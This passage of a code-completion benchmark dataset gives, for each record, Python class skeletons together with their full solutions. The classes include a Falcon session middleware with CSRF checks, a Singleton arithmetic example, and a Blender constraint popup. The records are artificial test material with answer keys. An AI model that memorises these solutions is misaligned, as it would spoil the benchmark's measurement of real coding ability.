'POST':\n csrf = req.get_header('X-CSRF-Token')\n if csrf is None or csrf != req.context['user']['csrf_token']:\n req.context.logger.error('[ПОПЫТКА CSRF] uid %s, sid %s' % (req.context['user']['uid'], req.context['user']['sid']))\n raise falcon.HTTPUnauthorized(description='Неверный CSRF-токен')\n<|end_body_3|>\n\n<|body_start_4|>\n exempted = req.method in self.config['exempt_methods']['global'] or req.uri_template in self.config['exempt_routes'] or req.method in self.config['exempt_methods'][str(resource)]\n try:\n req.context['user'] = self.manager.authenticate(req.context.session, req.cookies)\n except BadAuthError:\n req.context['user'] = None\n if exempted:\n return\n else:\n raise falcon.HTTPUnauthorized\n self.csrf_protect(req)\n<|end_body_4|>\n", "class_docstring": "", "class_name": "SessionMiddleware", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SessionMiddleware:\n\n def __init__(self, api, exempt_routes=list(), exempt_methods=list()):\n \"\"\"Класс, содержащий сессионный middleware. Для настройки исключений используется проход по всем эндпоинтам и поиск настроек в аттрибутах классов, также можно передать эти параметры в аргументах конструктора. Аргументы: api(falcon.App, необходим): ссылка на экземпляр API. exempt_routes(list, опционально): список путей, не требущих аутентификации. exempt_methods(list, опционально): список методов, не требующих аутентификации.\"\"\"\n <|body_0|>\n\n def _get_all_routes(self, api):\n \"\"\"Ищет все пары вида (класс ресурса, шаблон URI) в API Аргументы: api(falcon.App, необходим): ссылка на экземпляр API.\"\"\"\n <|body_1|>\n\n def _get_settings(self, resource, uri_template):\n \"\"\"Собирает настройки из класса эндпоинта и добавляет их в глобальный конфиг. Аргументы: resource(необходим): ссылка на экземпляр класса эндпоинта. uri_template(string, необходим): строка, по которой производится маршрутизация к этому эндпоинту.\"\"\"\n <|body_2|>\n\n def csrf_protect(self, req):\n \"\"\"Проверяет CSRF-токен всех POST-запросов. Выбрасывает исключение, если запрос не проходит проверку. Аргументы: req(необходим): текущий запрос.\"\"\"\n <|body_3|>\n\n def process_resource(self, req, resp, resource, params):\n \"\"\"Автоматически вызывается Falcon при получении запроса. Аутентифицирует пользователя, проверяет CSRF-токен, а также добавляет в контекст запроса информацию о пользователе и его сессии.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.manager = SessionManager()\n self.config = dict()\n self.config['exempt_routes'] = exempt_routes\n self.config['exempt_methods'] = dict()\n self.config['exempt_methods']['global'] = exempt_methods\n routes = self._get_all_routes(api)\n for route in routes:\n self._get_settings(*route)\n<|end_body_0|>\n\n<|body_start_1|>\n routes = []\n\n def get_node_and_children(node):\n routes.append((node.resource, node.uri_template))\n if len(node.children):\n for child_node in node.children:\n get_node_and_children(child_node)\n for node in api._router._roots:\n get_node_and_children(node)\n return routes\n<|end_body_1|>\n\n<|body_start_2|>\n local_conf = getattr(resource, 'auth', {})\n if local_conf.get('disabled'):\n self.config['exempt_routes'].append(uri_template)\n self.config['exempt_methods'][str(resource)] = local_conf.get('exempt_methods', [])\n<|end_body_2|>\n\n<|body_start_3|>\n if req.method == 'POST':\n csrf = req.get_header('X-CSRF-Token')\n if csrf is None or csrf != req.context['user']['csrf_token']:\n req.context.logger.error('[ПОПЫТКА CSRF] uid %s, sid %s' % (req.context['user']['uid'], req.context['user']['sid']))\n raise falcon.HTTPUnauthorized(description='Неверный CSRF-токен')\n<|end_body_3|>\n\n<|body_start_4|>\n exempted = req.method in self.config['exempt_methods']['global'] or req.uri_template in self.config['exempt_routes'] or req.method in self.config['exempt_methods'][str(resource)]\n try:\n req.context['user'] = self.manager.authenticate(req.context.session, req.cookies)\n except BadAuthError:\n req.context['user'] = None\n if exempted:\n return\n else:\n raise falcon.HTTPUnauthorized\n self.csrf_protect(req)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000401", "length_bytes": 4747, "license_type": "permissive", "methods": [{"docstring": "Класс, содержащий сессионный middleware. Для настройки исключений используется проход по всем эндпоинтам и поиск настроек в аттрибутах классов, также можно передать эти параметры в аргументах конструктора. Аргументы: api(falcon.App, необходим): ссылка на экземпляр API. exempt_routes(list, опционально): список путей, не требущих аутентификации. exempt_methods(list, опционально): список методов, не требующих аутентификации.", "name": "__init__", "signature": "def __init__(self, api, exempt_routes=list(), exempt_methods=list())"}, {"docstring": "Ищет все пары вида (класс ресурса, шаблон URI) в API Аргументы: api(falcon.App, необходим): ссылка на экземпляр API.", "name": "_get_all_routes", "signature": "def _get_all_routes(self, api)"}, {"docstring": "Собирает настройки из класса эндпоинта и добавляет их в глобальный конфиг. Аргументы: resource(необходим): ссылка на экземпляр класса эндпоинта. uri_template(string, необходим): строка, по которой производится маршрутизация к этому эндпоинту.", "name": "_get_settings", "signature": "def _get_settings(self, resource, uri_template)"}, {"docstring": "Проверяет CSRF-токен всех POST-запросов. Выбрасывает исключение, если запрос не проходит проверку. Аргументы: req(необходим): текущий запрос.", "name": "csrf_protect", "signature": "def csrf_protect(self, req)"}, {"docstring": "Автоматически вызывается Falcon при получении запроса. Аутентифицирует пользователя, проверяет CSRF-токен, а также добавляет в контекст запроса информацию о пользователе и его сессии.", "name": "process_resource", "signature": "def process_resource(self, req, resp, resource, params)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_001079", "prompt": "Implement the Python class `SessionMiddleware` described below.\n\nClass description:\nImplement the SessionMiddleware class.\n\nMethod signatures and docstrings:\n- def __init__(self, api, exempt_routes=list(), exempt_methods=list()): Класс, содержащий сессионный middleware. Для настройки исключений используется проход по всем эндпоинтам и поиск настроек в аттрибутах классов, также можно передать эти параметры в аргументах конструктора. Аргументы: api(falcon.App, необходим): ссылка на экземпляр API. exempt_routes(list, опционально): список путей, не требущих аутентификации. exempt_methods(list, опционально): список методов, не требующих аутентификации.\n- def _get_all_routes(self, api): Ищет все пары вида (класс ресурса, шаблон URI) в API Аргументы: api(falcon.App, необходим): ссылка на экземпляр API.\n- def _get_settings(self, resource, uri_template): Собирает настройки из класса эндпоинта и добавляет их в глобальный конфиг. Аргументы: resource(необходим): ссылка на экземпляр класса эндпоинта. uri_template(string, необходим): строка, по которой производится маршрутизация к этому эндпоинту.\n- def csrf_protect(self, req): Проверяет CSRF-токен всех POST-запросов. Выбрасывает исключение, если запрос не проходит проверку. Аргументы: req(необходим): текущий запрос.\n- def process_resource(self, req, resp, resource, params): Автоматически вызывается Falcon при получении запроса. Аутентифицирует пользователя, проверяет CSRF-токен, а также добавляет в контекст запроса информацию о пользователе и его сессии.", "prompted_full_text": "Implement the Python class `SessionMiddleware` described below.\n\nClass description:\nImplement the SessionMiddleware class.\n\nMethod signatures and docstrings:\n- def __init__(self, api, exempt_routes=list(), exempt_methods=list()): Класс, содержащий сессионный middleware. Для настройки исключений используется проход по всем эндпоинтам и поиск настроек в аттрибутах классов, также можно передать эти параметры в аргументах конструктора. Аргументы: api(falcon.App, необходим): ссылка на экземпляр API. exempt_routes(list, опционально): список путей, не требущих аутентификации. exempt_methods(list, опционально): список методов, не требующих аутентификации.\n- def _get_all_routes(self, api): Ищет все пары вида (класс ресурса, шаблон URI) в API Аргументы: api(falcon.App, необходим): ссылка на экземпляр API.\n- def _get_settings(self, resource, uri_template): Собирает настройки из класса эндпоинта и добавляет их в глобальный конфиг. Аргументы: resource(необходим): ссылка на экземпляр класса эндпоинта. uri_template(string, необходим): строка, по которой производится маршрутизация к этому эндпоинту.\n- def csrf_protect(self, req): Проверяет CSRF-токен всех POST-запросов. Выбрасывает исключение, если запрос не проходит проверку. Аргументы: req(необходим): текущий запрос.\n- def process_resource(self, req, resp, resource, params): Автоматически вызывается Falcon при получении запроса. Аутентифицирует пользователя, проверяет CSRF-токен, а также добавляет в контекст запроса информацию о пользователе и его сессии.\n\n<|skeleton|>\nclass SessionMiddleware:\n\n def __init__(self, api, exempt_routes=list(), exempt_methods=list()):\n \"\"\"Класс, содержащий сессионный middleware. Для настройки исключений используется проход по всем эндпоинтам и поиск настроек в аттрибутах классов, также можно передать эти параметры в аргументах конструктора. Аргументы: api(falcon.App, необходим): ссылка на экземпляр API. exempt_routes(list, опционально): список путей, не требущих аутентификации. exempt_methods(list, опционально): список методов, не требующих аутентификации.\"\"\"\n <|body_0|>\n\n def _get_all_routes(self, api):\n \"\"\"Ищет все пары вида (класс ресурса, шаблон URI) в API Аргументы: api(falcon.App, необходим): ссылка на экземпляр API.\"\"\"\n <|body_1|>\n\n def _get_settings(self, resource, uri_template):\n \"\"\"Собирает настройки из класса эндпоинта и добавляет их в глобальный конфиг. Аргументы: resource(необходим): ссылка на экземпляр класса эндпоинта. uri_template(string, необходим): строка, по которой производится маршрутизация к этому эндпоинту.\"\"\"\n <|body_2|>\n\n def csrf_protect(self, req):\n \"\"\"Проверяет CSRF-токен всех POST-запросов. Выбрасывает исключение, если запрос не проходит проверку. Аргументы: req(необходим): текущий запрос.\"\"\"\n <|body_3|>\n\n def process_resource(self, req, resp, resource, params):\n \"\"\"Автоматически вызывается Falcon при получении запроса. Аутентифицирует пользователя, проверяет CSRF-токен, а также добавляет в контекст запроса информацию о пользователе и его сессии.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.manager = SessionManager()\n self.config = dict()\n self.config['exempt_routes'] = exempt_routes\n self.config['exempt_methods'] = dict()\n self.config['exempt_methods']['global'] = exempt_methods\n routes = self._get_all_routes(api)\n for route in routes:\n self._get_settings(*route)\n<|end_body_0|>\n\n<|body_start_1|>\n routes = []\n\n def get_node_and_children(node):\n routes.append((node.resource, node.uri_template))\n if len(node.children):\n for child_node in node.children:\n get_node_and_children(child_node)\n for node in api._router._roots:\n get_node_and_children(node)\n return routes\n<|end_body_1|>\n\n<|body_start_2|>\n local_conf = getattr(resource, 'auth', {})\n if local_conf.get('disabled'):\n self.config['exempt_routes'].append(uri_template)\n self.config['exempt_methods'][str(resource)] = local_conf.get('exempt_methods', [])\n<|end_body_2|>\n\n<|body_start_3|>\n if req.method == 'POST':\n csrf = req.get_header('X-CSRF-Token')\n if csrf is None or csrf != req.context['user']['csrf_token']:\n req.context.logger.error('[ПОПЫТКА CSRF] uid %s, sid %s' % (req.context['user']['uid'], req.context['user']['sid']))\n raise falcon.HTTPUnauthorized(description='Неверный CSRF-токен')\n<|end_body_3|>\n\n<|body_start_4|>\n exempted = req.method in self.config['exempt_methods']['global'] or req.uri_template in self.config['exempt_routes'] or req.method in self.config['exempt_methods'][str(resource)]\n try:\n req.context['user'] = self.manager.authenticate(req.context.session, req.cookies)\n except BadAuthError:\n req.context['user'] = None\n if exempted:\n return\n else:\n raise falcon.HTTPUnauthorized\n self.csrf_protect(req)\n<|end_body_4|>\n", "revision_id": "37cdc4702dcacd0f187cca788e751e187fcd4499", "skeleton": "<|skeleton|>\nclass SessionMiddleware:\n\n def __init__(self, api, exempt_routes=list(), exempt_methods=list()):\n \"\"\"Класс, содержащий сессионный middleware. Для настройки исключений используется проход по всем эндпоинтам и поиск настроек в аттрибутах классов, также можно передать эти параметры в аргументах конструктора. Аргументы: api(falcon.App, необходим): ссылка на экземпляр API. exempt_routes(list, опционально): список путей, не требущих аутентификации. exempt_methods(list, опционально): список методов, не требующих аутентификации.\"\"\"\n <|body_0|>\n\n def _get_all_routes(self, api):\n \"\"\"Ищет все пары вида (класс ресурса, шаблон URI) в API Аргументы: api(falcon.App, необходим): ссылка на экземпляр API.\"\"\"\n <|body_1|>\n\n def _get_settings(self, resource, uri_template):\n \"\"\"Собирает настройки из класса эндпоинта и добавляет их в глобальный конфиг. Аргументы: resource(необходим): ссылка на экземпляр класса эндпоинта. uri_template(string, необходим): строка, по которой производится маршрутизация к этому эндпоинту.\"\"\"\n <|body_2|>\n\n def csrf_protect(self, req):\n \"\"\"Проверяет CSRF-токен всех POST-запросов. Выбрасывает исключение, если запрос не проходит проверку. Аргументы: req(необходим): текущий запрос.\"\"\"\n <|body_3|>\n\n def process_resource(self, req, resp, resource, params):\n \"\"\"Автоматически вызывается Falcon при получении запроса. Аутентифицирует пользователя, проверяет CSRF-токен, а также добавляет в контекст запроса информацию о пользователе и его сессии.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SessionMiddleware:\n def __init__(self, api, exempt_routes=list(), exempt_methods=list()):\n \"\"\"Класс, содержащий сессионный middleware. Для настройки исключений используется проход по всем эндпоинтам и поиск настроек в аттрибутах классов, также можно передать эти параметры в аргументах конструктора. Аргументы: api(falcon.App, необходим): ссылка на экземпляр API. exempt_routes(list, опционально): список путей, не требущих аутентификации. exempt_methods(list, опционально): список методов, не требующих аутентификации.\"\"\"\n self.manager = SessionManager()\n self.config = dict()\n self.config['exempt_routes'] = exempt_routes\n self.config['exempt_methods'] = dict()\n self.config['exempt_methods']['global'] = exempt_methods\n routes = self._get_all_routes(api)\n for route in routes:\n self._get_settings(*route)\n\n def _get_all_routes(self, api):\n \"\"\"Ищет все пары вида (класс ресурса, шаблон URI) в API Аргументы: api(falcon.App, необходим): ссылка на экземпляр API.\"\"\"\n routes = []\n\n def get_node_and_children(node):\n routes.append((node.resource, node.uri_template))\n if len(node.children):\n for child_node in node.children:\n get_node_and_children(child_node)\n for node in api._router._roots:\n get_node_and_children(node)\n return routes\n\n def _get_settings(self, resource, uri_template):\n \"\"\"Собирает настройки из класса эндпоинта и добавляет их в глобальный конфиг. Аргументы: resource(необходим): ссылка на экземпляр класса эндпоинта. uri_template(string, необходим): строка, по которой производится маршрутизация к этому эндпоинту.\"\"\"\n local_conf = getattr(resource, 'auth', {})\n if local_conf.get('disabled'):\n self.config['exempt_routes'].append(uri_template)\n self.config['exempt_methods'][str(resource)] = local_conf.get('exempt_methods', [])\n\n def csrf_protect(self, req):\n \"\"\"Проверяет CSRF-токен всех POST-запросов. Выбрасывает исключение, если запрос не проходит проверку. Аргументы: req(необходим): текущий запрос.\"\"\"\n if req.method == 'POST':\n csrf = req.get_header('X-CSRF-Token')\n if csrf is None or csrf != req.context['user']['csrf_token']:\n req.context.logger.error('[ПОПЫТКА CSRF] uid %s, sid %s' % (req.context['user']['uid'], req.context['user']['sid']))\n raise falcon.HTTPUnauthorized(description='Неверный CSRF-токен')\n\n def process_resource(self, req, resp, resource, params):\n \"\"\"Автоматически вызывается Falcon при получении запроса. Аутентифицирует пользователя, проверяет CSRF-токен, а также добавляет в контекст запроса информацию о пользователе и его сессии.\"\"\"\n exempted = req.method in self.config['exempt_methods']['global'] or req.uri_template in self.config['exempt_routes'] or req.method in self.config['exempt_methods'][str(resource)]\n try:\n req.context['user'] = self.manager.authenticate(req.context.session, req.cookies)\n except BadAuthError:\n req.context['user'] = None\n if exempted:\n return\n else:\n raise falcon.HTTPUnauthorized\n self.csrf_protect(req)\n", "source": "the_stack_v2_python_sparse", "source_path": "cyberdas/middleware/session.py", "source_repo": "wild-trip/CyberDAS-API", "split": "test", "star_events_count": 0} {"blob_id": "7f549b8e87c02b1983d8640f731d6fe530f1a91c", "bodies": ["a = int(input('Birinci Sayı:'))\nb = int(input('İkinci Sayı:'))\nif Singleton.__instance == None:\n Singleton()\nreturn ('Toplam:', a + b, 'fark: ', a - b, 'Carpim: ', a * b, 'bolum: ', a / b)", "if Singleton.__instance != None:\n raise Exception('This class is a singleton!')\nelse:\n Singleton.__instance = self"], "bodies_text": "<|body_start_0|>\n a = int(input('Birinci Sayı:'))\n b = int(input('İkinci Sayı:'))\n if Singleton.__instance == None:\n Singleton()\n return ('Toplam:', a + b, 'fark: ', a - b, 'Carpim: ', a * b, 'bolum: ', a / b)\n<|end_body_0|>\n\n<|body_start_1|>\n if Singleton.__instance != None:\n raise Exception('This class is a singleton!')\n else:\n Singleton.__instance = self\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Singleton", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Singleton:\n\n def getInstance():\n \"\"\"Static access method.\"\"\"\n <|body_0|>\n\n def __init__(self):\n \"\"\"Virtually private constructor.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n a = int(input('Birinci Sayı:'))\n b = int(input('İkinci Sayı:'))\n if Singleton.__instance == None:\n Singleton()\n return ('Toplam:', a + b, 'fark: ', a - b, 'Carpim: ', a * b, 'bolum: ', a / b)\n<|end_body_0|>\n\n<|body_start_1|>\n if Singleton.__instance != None:\n raise Exception('This class is a singleton!')\n else:\n Singleton.__instance = self\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000402", "length_bytes": 768, "license_type": "no_license", "methods": [{"docstring": "Static access method.", "name": "getInstance", "signature": "def getInstance()"}, {"docstring": "Virtually private constructor.", "name": "__init__", "signature": "def __init__(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005482", "prompt": "Implement the Python class `Singleton` described below.\n\nClass description:\nImplement the Singleton class.\n\nMethod signatures and docstrings:\n- def getInstance(): Static access method.\n- def __init__(self): Virtually private constructor.", "prompted_full_text": "Implement the Python class `Singleton` described below.\n\nClass description:\nImplement the Singleton class.\n\nMethod signatures and docstrings:\n- def getInstance(): Static access method.\n- def __init__(self): Virtually private constructor.\n\n<|skeleton|>\nclass Singleton:\n\n def getInstance():\n \"\"\"Static access method.\"\"\"\n <|body_0|>\n\n def __init__(self):\n \"\"\"Virtually private constructor.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n a = int(input('Birinci Sayı:'))\n b = int(input('İkinci Sayı:'))\n if Singleton.__instance == None:\n Singleton()\n return ('Toplam:', a + b, 'fark: ', a - b, 'Carpim: ', a * b, 'bolum: ', a / b)\n<|end_body_0|>\n\n<|body_start_1|>\n if Singleton.__instance != None:\n raise Exception('This class is a singleton!')\n else:\n Singleton.__instance = self\n<|end_body_1|>\n", "revision_id": "259836447db6512c49df18fb847a6dd5ae0c308b", "skeleton": "<|skeleton|>\nclass Singleton:\n\n def getInstance():\n \"\"\"Static access method.\"\"\"\n <|body_0|>\n\n def __init__(self):\n \"\"\"Virtually private constructor.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Singleton:\n def getInstance():\n \"\"\"Static access method.\"\"\"\n a = int(input('Birinci Sayı:'))\n b = int(input('İkinci Sayı:'))\n if Singleton.__instance == None:\n Singleton()\n return ('Toplam:', a + b, 'fark: ', a - b, 'Carpim: ', a * b, 'bolum: ', a / b)\n\n def __init__(self):\n \"\"\"Virtually private constructor.\"\"\"\n if Singleton.__instance != None:\n raise Exception('This class is a singleton!')\n else:\n Singleton.__instance = self\n", "source": "the_stack_v2_python_sparse", "source_path": "singletiondortislem.py", "source_repo": "komurkara/GoruntuIsleme", "split": "test", "star_events_count": 0} {"blob_id": "840e7b9ec9da1bfb6e1ea03702b21c13e531bb2e", "bodies": ["layout = self.layout\ncolumn = layout.column()\ncolumn.label(text=self.target + ':')\nif self.bone == '':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].constraints[self.target])\nelif context.mode == 'POSE':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].pose.bones[self.bone].constraints[self.target])", "if self.properties:\n for area in context.screen.areas:\n if area.type in 'PROPERTIES':\n if self.bone == '':\n area.spaces.active.context = 'CONSTRAINT'\n elif context.mode == 'POSE':\n area.spaces.active.context = 'BONE_CONSTRAINT'\n else:\n area.spaces.active.context = 'CONSTRAINT'\nreturn {'FINISHED'}", "try:\n size = 350 if addon.preferences['largePopups'] == 0 else 525\nexcept:\n size = 350\ncontext.window_manager.invoke_popup(self, width=size)\nreturn {'RUNNING_MODAL'}"], "bodies_text": "<|body_start_0|>\n layout = self.layout\n column = layout.column()\n column.label(text=self.target + ':')\n if self.bone == '':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].constraints[self.target])\n elif context.mode == 'POSE':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].pose.bones[self.bone].constraints[self.target])\n<|end_body_0|>\n\n<|body_start_1|>\n if self.properties:\n for area in context.screen.areas:\n if area.type in 'PROPERTIES':\n if self.bone == '':\n area.spaces.active.context = 'CONSTRAINT'\n elif context.mode == 'POSE':\n area.spaces.active.context = 'BONE_CONSTRAINT'\n else:\n area.spaces.active.context = 'CONSTRAINT'\n return {'FINISHED'}\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n size = 350 if addon.preferences['largePopups'] == 0 else 525\n except:\n size = 350\n context.window_manager.invoke_popup(self, width=size)\n return {'RUNNING_MODAL'}\n<|end_body_2|>\n", "class_docstring": "This is operator is used to create the required pop-up panel.", "class_name": "constraint", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass constraint:\n \"\"\"This is operator is used to create the required pop-up panel.\"\"\"\n\n def draw(self, context):\n \"\"\"Draw the constraint options.\"\"\"\n <|body_0|>\n\n def execute(self, context):\n \"\"\"Execute the operator.\"\"\"\n <|body_1|>\n\n def invoke(self, context, event):\n \"\"\"Invoke the operator panel/menu, control its width.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n layout = self.layout\n column = layout.column()\n column.label(text=self.target + ':')\n if self.bone == '':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].constraints[self.target])\n elif context.mode == 'POSE':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].pose.bones[self.bone].constraints[self.target])\n<|end_body_0|>\n\n<|body_start_1|>\n if self.properties:\n for area in context.screen.areas:\n if area.type in 'PROPERTIES':\n if self.bone == '':\n area.spaces.active.context = 'CONSTRAINT'\n elif context.mode == 'POSE':\n area.spaces.active.context = 'BONE_CONSTRAINT'\n else:\n area.spaces.active.context = 'CONSTRAINT'\n return {'FINISHED'}\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n size = 350 if addon.preferences['largePopups'] == 0 else 525\n except:\n size = 350\n context.window_manager.invoke_popup(self, width=size)\n return {'RUNNING_MODAL'}\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000403", "length_bytes": 17024, "license_type": "no_license", "methods": [{"docstring": "Draw the constraint options.", "name": "draw", "signature": "def draw(self, context)"}, {"docstring": "Execute the operator.", "name": "execute", "signature": "def execute(self, context)"}, {"docstring": "Invoke the operator panel/menu, control its width.", "name": "invoke", "signature": "def invoke(self, context, event)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000857", "prompt": "Implement the Python class `constraint` described below.\n\nClass description:\nThis is operator is used to create the required pop-up panel.\n\nMethod signatures and docstrings:\n- def draw(self, context): Draw the constraint options.\n- def execute(self, context): Execute the operator.\n- def invoke(self, context, event): Invoke the operator panel/menu, control its width.", "prompted_full_text": "Implement the Python class `constraint` described below.\n\nClass description:\nThis is operator is used to create the required pop-up panel.\n\nMethod signatures and docstrings:\n- def draw(self, context): Draw the constraint options.\n- def execute(self, context): Execute the operator.\n- def invoke(self, context, event): Invoke the operator panel/menu, control its width.\n\n<|skeleton|>\nclass constraint:\n \"\"\"This is operator is used to create the required pop-up panel.\"\"\"\n\n def draw(self, context):\n \"\"\"Draw the constraint options.\"\"\"\n <|body_0|>\n\n def execute(self, context):\n \"\"\"Execute the operator.\"\"\"\n <|body_1|>\n\n def invoke(self, context, event):\n \"\"\"Invoke the operator panel/menu, control its width.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n layout = self.layout\n column = layout.column()\n column.label(text=self.target + ':')\n if self.bone == '':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].constraints[self.target])\n elif context.mode == 'POSE':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].pose.bones[self.bone].constraints[self.target])\n<|end_body_0|>\n\n<|body_start_1|>\n if self.properties:\n for area in context.screen.areas:\n if area.type in 'PROPERTIES':\n if self.bone == '':\n area.spaces.active.context = 'CONSTRAINT'\n elif context.mode == 'POSE':\n area.spaces.active.context = 'BONE_CONSTRAINT'\n else:\n area.spaces.active.context = 'CONSTRAINT'\n return {'FINISHED'}\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n size = 350 if addon.preferences['largePopups'] == 0 else 525\n except:\n size = 350\n context.window_manager.invoke_popup(self, width=size)\n return {'RUNNING_MODAL'}\n<|end_body_2|>\n", "revision_id": "7b796d30dfd22b7706a93e4419ed913d18d29a44", "skeleton": "<|skeleton|>\nclass constraint:\n \"\"\"This is operator is used to create the required pop-up panel.\"\"\"\n\n def draw(self, context):\n \"\"\"Draw the constraint options.\"\"\"\n <|body_0|>\n\n def execute(self, context):\n \"\"\"Execute the operator.\"\"\"\n <|body_1|>\n\n def invoke(self, context, event):\n \"\"\"Invoke the operator panel/menu, control its width.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class constraint:\n \"\"\"This is operator is used to create the required pop-up panel.\"\"\"\n\n def draw(self, context):\n \"\"\"Draw the constraint options.\"\"\"\n layout = self.layout\n column = layout.column()\n column.label(text=self.target + ':')\n if self.bone == '':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].constraints[self.target])\n elif context.mode == 'POSE':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].pose.bones[self.bone].constraints[self.target])\n\n def execute(self, context):\n \"\"\"Execute the operator.\"\"\"\n if self.properties:\n for area in context.screen.areas:\n if area.type in 'PROPERTIES':\n if self.bone == '':\n area.spaces.active.context = 'CONSTRAINT'\n elif context.mode == 'POSE':\n area.spaces.active.context = 'BONE_CONSTRAINT'\n else:\n area.spaces.active.context = 'CONSTRAINT'\n return {'FINISHED'}\n\n def invoke(self, context, event):\n \"\"\"Invoke the operator panel/menu, control its width.\"\"\"\n try:\n size = 350 if addon.preferences['largePopups'] == 0 else 525\n except:\n size = 350\n context.window_manager.invoke_popup(self, width=size)\n return {'RUNNING_MODAL'}\n", "source": "the_stack_v2_python_sparse", "source_path": "All_In_One/addons/name_panel/scripts/operator/icon.py", "source_repo": "2434325680/Learnbgame", "split": "test", "star_events_count": 0} {"blob_id": "d472f5576f911296750003c7773aa2cc14b39898", "bodies": ["self.argmap = {}\nself.required_params = []\nself.repeated_params = []\nself.pattern_params = {}\nself.query_params = []\nself.path_params = set()\nself.param_types = {}\nself.enum_params = {}\nself.set_parameters(method_desc)", "for arg, desc in six.iteritems(method_desc.get('parameters', {})):\n param = key2param(arg)\n self.argmap[param] = arg\n if desc.get('pattern'):\n self.pattern_params[param] = desc['pattern']\n if desc.get('enum'):\n self.enum_params[param] = desc['enum']\n if desc.get('required'):\n self.required_params.append(param)\n if desc.get('repeated'):\n self.repeated_params.append(param)\n if desc.get('location') == 'query':\n self.query_params.append(param)\n if desc.get('location') == 'path':\n self.path_params.add(param)\n self.param_types[param] = desc.get('type', 'string')\nfor match in URITEMPLATE.finditer(method_desc['path']):\n for namematch in VARNAME.finditer(match.group(0)):\n name = key2param(namematch.group(0))\n self.path_params.add(name)\n if name in self.query_params:\n self.query_params.remove(name)"], "bodies_text": "<|body_start_0|>\n self.argmap = {}\n self.required_params = []\n self.repeated_params = []\n self.pattern_params = {}\n self.query_params = []\n self.path_params = set()\n self.param_types = {}\n self.enum_params = {}\n self.set_parameters(method_desc)\n<|end_body_0|>\n\n<|body_start_1|>\n for arg, desc in six.iteritems(method_desc.get('parameters', {})):\n param = key2param(arg)\n self.argmap[param] = arg\n if desc.get('pattern'):\n self.pattern_params[param] = desc['pattern']\n if desc.get('enum'):\n self.enum_params[param] = desc['enum']\n if desc.get('required'):\n self.required_params.append(param)\n if desc.get('repeated'):\n self.repeated_params.append(param)\n if desc.get('location') == 'query':\n self.query_params.append(param)\n if desc.get('location') == 'path':\n self.path_params.add(param)\n self.param_types[param] = desc.get('type', 'string')\n for match in URITEMPLATE.finditer(method_desc['path']):\n for namematch in VARNAME.finditer(match.group(0)):\n name = key2param(namematch.group(0))\n self.path_params.add(name)\n if name in self.query_params:\n self.query_params.remove(name)\n<|end_body_1|>\n", "class_docstring": "Represents the parameters associated with a method. Attributes: argmap: Map from method parameter name (string) to query parameter name (string). required_params: List of required parameters (represented by parameter name as string). repeated_params: List of repeated parameters (represented by parameter name as string). pattern_params: Map from method parameter name (string) to regular expression (as a string). If the pattern is set for a parameter, the value for that parameter must match the regular expression. query_params: List of parameters (represented by parameter name as string) that will be used in the query string. path_params: Set of parameters (represented by parameter name as str", "class_name": "ResourceMethodParameters", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ResourceMethodParameters:\n \"\"\"Represents the parameters associated with a method. Attributes: argmap: Map from method parameter name (string) to query parameter name (string). required_params: List of required parameters (represented by parameter name as string). repeated_params: List of repeated parameters (represented by parameter name as string). pattern_params: Map from method parameter name (string) to regular expression (as a string). If the pattern is set for a parameter, the value for that parameter must match the regular expression. query_params: List of parameters (represented by parameter name as string) that will be used in the query string. path_params: Set of parameters (represented by parameter name as str\"\"\"\n\n def __init__(self, method_desc):\n \"\"\"Constructor for ResourceMethodParameters. Sets default values and defers to set_parameters to populate. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\"\"\"\n <|body_0|>\n\n def set_parameters(self, method_desc):\n \"\"\"Populates maps and lists based on method description. Iterates through each parameter for the method and parses the values from the parameter dictionary. Args: method_desc: Dictionary with metadata 